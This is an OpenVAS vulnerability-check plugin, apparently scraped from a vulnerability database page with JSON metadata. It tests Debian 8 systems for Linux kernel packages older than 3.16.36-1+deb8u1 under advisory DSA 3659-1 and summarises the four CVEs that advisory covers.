ID OPENVAS:1361412562310703659 Type openvas Reporter Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net Modified 2019-03-18T00:00:00
Description
Several vulnerabilities have been
discovered in the Linux kernel that may lead to a privilege escalation,
denial of service or have other impacts.
CVE-2016-5696
Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.
Krishnamurthy of the University of California, Riverside, and Lisa
M. Marvel of the United States Army Research Laboratory discovered
that Linux
# OpenVAS Vulnerability Test
# $Id: deb_3659.nasl 14279 2019-03-18 14:48:34Z cfischer $
# Auto-generated from advisory DSA 3659-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.703659");
script_version("$Revision: 14279 $");
script_cve_id("CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6480", "CVE-2016-6828");
script_name("Debian Security Advisory DSA 3659-1 (linux - security update)");
script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $");
script_tag(name:"creation_date", value:"2016-09-04 00:00:00 +0200 (Sun, 04 Sep 2016)");
script_tag(name:"cvss_base", value:"5.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:P");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"package");
script_xref(name:"URL", value:"http://www.debian.org/security/2016/dsa-3659.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB8");
script_tag(name:"affected", value:"linux on Debian Linux");
script_tag(name:"solution", value:"For the stable distribution (jessie),
these problems have been fixed in version 3.16.36-1+deb8u1. In addition, this
update contains several changes originally targeted for the upcoming jessie
point release.
We recommend that you upgrade your linux packages.");
script_tag(name:"summary", value:"Several vulnerabilities have been
discovered in the Linux kernel that may lead to a privilege escalation,
denial of service or have other impacts.
CVE-2016-5696
Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.
Krishnamurthy of the University of California, Riverside, and Lisa
M. Marvel of the United States Army Research Laboratory discovered
that Linux's implementation of the TCP Challenge ACK feature
results in a side channel that can be used to find TCP connections
between specific IP addresses, and to inject messages into those
connections.
Where a service is made available through TCP, this may allow
remote attackers to impersonate another connected user to the
server or to impersonate the server to another connected user. In
case the service uses a protocol with message authentication
(e.g. TLS or SSH), this vulnerability only allows denial of
service (connection failure). An attack takes tens of seconds, so
short-lived TCP connections are also unlikely to be vulnerable.
This may be mitigated by increasing the rate limit for TCP
Challenge ACKs so that it is never exceeded:
sysctl net.ipv4.tcp_challenge_ack_limit=1000000000
CVE-2016-6136
Pengfei Wang discovered that the audit subsystem has a
'double-fetch' or TOCTTOU
bug in its handling of special
characters in the name of an executable. Where audit logging of
execve() is enabled, this allows a local user to generate
misleading log messages.
CVE-2016-6480
Pengfei Wang discovered that the aacraid driver for Adaptec RAID
controllers has a 'double-fetch' or TOCTTOU bug in its
validation of FIB
messages passed through the ioctl() system
call. This has no practical security impact in current Debian
releases.
CVE-2016-6828
Marco Grassi reported a 'use-after-free' bug in the TCP
implementation, which can be triggered by local users. The
security impact is unclear, but might include denial of service or
privilege escalation.");
script_tag(name:"vuldetect", value:"This check tests the installed software version using the apt package manager.");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
res = "";
report = "";
if((res = isdpkgvuln(pkg:"linux-compiler-gcc-4.8-arm", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-compiler-gcc-4.8-s390", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-compiler-gcc-4.8-x86", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-doc-3.16", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-4kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-586", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-5kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-686-pae", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-amd64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-arm64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-armel", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-armhf", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-i386", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-mips", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-mipsel", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-powerpc", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-ppc64el", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-all-s390x", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-amd64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-arm64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-armmp", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-armmp-lpae", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-common", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-ixp4xx", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-kirkwood", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-loongson-2e", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-loongson-2f", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-loongson-3", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-octeon", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-orion5x", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-powerpc", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-powerpc-smp", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-powerpc64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-powerpc64le", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-r4k-ip22", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-r5k-ip32", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-s390x", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-sb1-bcm91250a", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.16.0-4-versatile", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-4kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-5kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-all", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-all-mips", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-all-mipsel", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-common", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-loongson-2f", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-octeon", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-r4k-ip22", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-r5k-cobalt", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-r5k-ip32", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-sb1-bcm91250a", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-headers-3.2.0-4-sb1a-bcm91480b", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-4kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-586", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-5kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-686-pae", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-686-pae-dbg", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-amd64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-amd64-dbg", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-arm64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-arm64-dbg", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-armmp", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-armmp-lpae", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-ixp4xx", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-kirkwood", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-loongson-2e", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-loongson-2f", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-loongson-3", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-octeon", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-orion5x", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-powerpc", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-powerpc-smp", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-powerpc64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-powerpc64le", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-r4k-ip22", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-r5k-ip32", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-s390x", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-s390x-dbg", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-sb1-bcm91250a", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.16.0-4-versatile", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-4kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-5kc-malta", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-loongson-2f", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-octeon", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-r4k-ip22", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-r5k-cobalt", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-r5k-ip32", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-sb1-bcm91250a", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-image-3.2.0-4-sb1a-bcm91480b", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-libc-dev", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-manual-3.16", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-source-3.16", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"linux-support-3.16.0-4", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"xen-linux-system-3.16.0-4-amd64", ver:"3.16.36-1+deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if(report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99);
}
{"id": "OPENVAS:1361412562310703659", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3659-1 (linux - security update)", "description": "Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside, and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux", "published": "2016-09-04T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703659", "reporter": "Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2016/dsa-3659.html"], "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "lastseen": "2019-05-29T18:35:16", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-6828"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3659-1:3F508", "DEBIAN:DLA-609-1:1025A"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3098-1.NASL", "UBUNTU_USN-3099-3.NASL", "UBUNTU_USN-3097-1.NASL", "DEBIAN_DLA-609.NASL", "FEDORA_2016-F1ADAAADC6.NASL", "UBUNTU_USN-3099-4.NASL", "UBUNTU_USN-3099-2.NASL", "DEBIAN_DSA-3659.NASL", "UBUNTU_USN-3098-2.NASL", "FEDORA_2016-2E5EBFED6D.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842910", "OPENVAS:703659", "OPENVAS:1361412562310842907", "OPENVAS:1361412562310842908", "OPENVAS:1361412562310842916", "OPENVAS:1361412562310842911", "OPENVAS:1361412562310842912", "OPENVAS:1361412562310842909", "OPENVAS:1361412562310809207", "OPENVAS:1361412562310809206"]}, {"type": "f5", "idList": ["F5:K37046163", "SOL46514822", "F5:K62442245", "F5:K46514822", "F5:K90803619"]}, {"type": "ubuntu", "idList": ["USN-3099-3", "USN-3099-2", "USN-3098-2", "USN-3097-2", "USN-3097-1", "USN-3099-1", "USN-3098-1", "USN-3099-4"]}, {"type": "fedora", "idList": ["FEDORA:EF73760748F5", "FEDORA:6675C6051CCF"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:DC8819DC530904F76913C7D9F499576C"]}, {"type": "redhat", "idList": ["RHSA-2016:1664", "RHSA-2016:1633", "RHSA-2016:1632", "2438571", "RHSA-2016:1815", "RHSA-2016:1631", "RHSA-2016:1939"]}, {"type": "suse", "idList": ["SUSE-SU-2016:3069-1", "SUSE-SU-2016:2230-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-3594", "ELSA-2016-1664", "ELSA-2016-1633", "ELSA-2016-3595"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20160907-01-TCP"]}, {"type": "thn", "idList": ["THN:B41554BF406DE03F01F4B7A7E4CD2A52", "THN:4FE2068BDC86E2EECDC3F2C86932F8F2"]}, {"type": "archlinux", "idList": ["ASA-201608-15", "ASA-201608-17", "ASA-201608-13", "ASA-201608-12"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0015"]}, {"type": "centos", "idList": ["CESA-2016:1664", "CESA-2016:1633"]}, {"type": "symantec", "idList": ["SMNTC-1378"]}, {"type": "exploitdb", "idList": ["EDB-ID:40731"]}], "modified": "2019-05-29T18:35:16", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2019-05-29T18:35:16", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310703659", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3659.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3659-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703659\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-5696\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_name(\"Debian Security Advisory DSA 3659-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-04 00:00:00 +0200 (Sun, 04 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3659.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\n these problems have been fixed in version 3.16.36-1+deb8u1. In addition, this\n update contains several changes originally targeted for the upcoming jessie\n point release.\n\n We recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside, and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux's implementation of the TCP Challenge ACK feature\nresults in a side channel that can be used to find TCP connections\nbetween specific IP addresses, and to inject messages into those\nconnections.\n\nWhere a service is made available through TCP, this may allow\nremote attackers to impersonate another connected user to the\nserver or to impersonate the server to another connected user. In\ncase the service uses a protocol with message authentication\n(e.g. TLS or SSH), this vulnerability only allows denial of\nservice (connection failure). An attack takes tens of seconds, so\nshort-lived TCP connections are also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded:\nsysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136\nPengfei Wang discovered that the audit subsystem has a\n'double-fetch' or TOCTTOU\nbug in its handling of special\ncharacters in the name of an executable. Where audit logging of\nexecve() is enabled, this allows a local user to generate\nmisleading log messages.\n\nCVE-2016-6480\nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or TOCTTOU bug in its\nvalidation of FIB\nmessages passed through the ioctl() system\ncall. This has no practical security impact in current Debian\nreleases.\n\nCVE-2016-6828\nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The\nsecurity impact is unclear, but might include denial of service or\nprivilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", 